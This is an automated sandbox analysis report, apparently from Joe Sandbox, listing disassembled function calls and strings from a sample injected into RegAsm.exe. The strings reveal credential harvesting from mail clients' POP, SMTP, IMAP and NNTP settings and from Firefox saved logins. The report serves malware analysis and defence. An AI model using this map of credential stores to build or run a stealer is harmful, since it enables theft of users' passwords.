                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                      • API String ID: 520177685-3817206916
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402B44
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32 ref: 00402BBD
                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                        • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                                                        • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Closememset$EnumOpenmemcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1880195650-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiQueryValueWidememcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1208763047-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                        • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                                                                                                                                                                                                                        • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Closememset$EnumOpen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1938129365-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoad
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 534179979-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4165544737-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Enum
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2928410991-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3660427363-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00407948: free.MSVCRT ref: 0040794B
                                                                                                                                                                                                                        • Part of subcall function 00407948: free.MSVCRT ref: 00407953
                                                                                                                                                                                                                      • free.MSVCRT ref: 00407D7C
                                                                                                                                                                                                                        • Part of subcall function 00407A1F: free.MSVCRT ref: 00407A2E
                                                                                                                                                                                                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                        • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                                                        • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$mallocmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3401966785-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                                                      • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                                                      • API String ID: 52435246-1534328989
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00406E94
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3604893535-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00406EA7
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406EB4
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00406EFB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3116012682-0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                      • API String ID: 3963849919-1658304561
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID: (yE$(yE$(yE
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004431AD
                                                                                                                                                                                                                      • strncmp.MSVCRT ref: 004431BD
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                                                                                                      • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                                                                      • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                                      • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                      • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                                                                                                      • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                                                                                                                                                                                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                                                        • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
